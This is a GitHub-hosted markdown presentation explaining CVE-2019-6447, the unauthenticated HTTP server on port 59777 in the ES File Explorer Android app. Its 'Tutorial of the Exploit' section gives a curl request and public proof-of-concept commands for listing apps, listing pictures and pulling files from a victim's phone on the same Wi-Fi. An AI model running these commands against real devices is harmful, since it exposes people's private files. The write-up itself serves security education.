<!DOCTYPE html>

wireshark_presentation/ESVulnerability.md at master · sbleh/wireshark_presentation
Skip to content
  • </option></form>
    Watch
    Notifications
  • </option></form>
    </input>
    </option></form>
    </input>
  • </option></form>

/wireshark_presentation

Permalink
Branch: master
Find file Copy path
4 contributors

Users who have contributed to this file

@Kpate372 @sbleh @rajatbalhotra @laveshbansal
103 lines (72 sloc) 5.47 KB
</option></form>
</option></form>

ES File Explorer Open Port Vulnerability (CVE-2019-6447)

If you are using the ES File Explorer on your Android phone you were just exposed to a huge vulnerability. It is fixed now (update your device!), but customers of the PRO version still seem to be exposed. What was the problem? Let's have a look!

ES File Explorer

The ES File Explorer is one of the most commonly used external File Management Applications for Android. It can be used to manage files, apps, cloud services and allows you to access your phone storage via Wi-Fi from another device. It was downloaded over 100 Million times and had a major security issue in version 4.1.9.7.4.]

alt

CVE-2019-6447 Vulnerability

The vulnerability CVE-2019-6447 was published by a hacker with the alias fs0c131y and has a CVE v3.0 score of 8.1. A hacker can have access to files or execute applications on the victims phone if he is in the same local network.

Every time a user launches ES File Explore a hidden HTTP server starts as well. This server opens port 59777 locally:

angler:/ # netstat -ap | grep com.estrongs
tcp6       0      0 :::59777                :::*                    LISTEN      5696/com.estrongs.android.pop

Furthermore, the server accepts JSON payloads from unauthenticated sources:

curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777

This allows attackers to gain access of and control over confidential data on the victim’s phone. The HTTP server is accessible to everybody in the local network and even remains open after the app is closed.

What can be exploited?

  • Succesfull exposure of this vulnerability can result in the disclosure of sensitive information as follows :-

    • List all the files in the sdcard in the victim device
    • List all the pictures in the victim device
    • List all the videos in the victim device
    • List all the audio files in the victim device
    • List all the apps installed in the victim device
    • List all the system apps installed in the victim device
    • List all the phone apps installed in the victim device
    • List all the apk files stored in the sdcard of the victim device
    • List all the apps installed in the victim device
    • Get device info of the victim device
    • Pull a file from the victim device
    • Launch an app of your choice
    • Get the icon of an app of your choice

    alt

CVE score of CVE-2019-6447

The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.This leads to CVE score of 8.1. alt

Tutorial of the Exploit

The TCP port remains open after the ES File explorer application has been launched once on the victim's Android phone. This allows hacker to gain access over the victim's mobile. The hacker can easily check the device information, list all the applications, download a picture and all of the exploits mentioned above.

The POC script for this exploit is availiable on github. Clone the repository using terminal to get the POC script. To run this script, the hacker connected on the same local network should have some python packages installed in its machine. Use the following command to install the packages.

pip install -r requirements.txt

After successfull installation of packages, the hacker can easily get the device information like local IP of device and model of the device.

python poc.py --cmd getDeviceInfo

alt

The hacker can also list all the installed applications on victims smart phone.

python poc.py --cmd listApps --network 192.168.0.

alt

The hacker can list all the pictures in the victims mobile phone and can also download any picture.

python poc.py --cmd listPics --network 192.168.0.
python poc.py -g /sdcard/Download/images.jpg --network 192.168.0.

For all other exploits, following command can be used. For more detailed information, check out the github link mentioned above.

python poc.py list

alt

Comments and Conclusion

  • Another local vulnerability was found in ES file explorer app: MITM

  • Man-In-The-Middle: Attacker connected to the same local network can intercept HTTP traffic and exchange it for his own.

  • ES file explorer got updated and vulnerabilities got fixed.

  • New version is available online ES File Explorer v4.1.9.9, where they have confirmed fixing the HTTP vulnerability in LAN.

Was this on purpose?
  • Discussion on twitter indicates that ES File Explorer vulnerability was done intentionally.

alt

Other application
  • ES File Explorer/Manger PRO version had vulnerabilities and was not updated for long time.
</option></form>
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.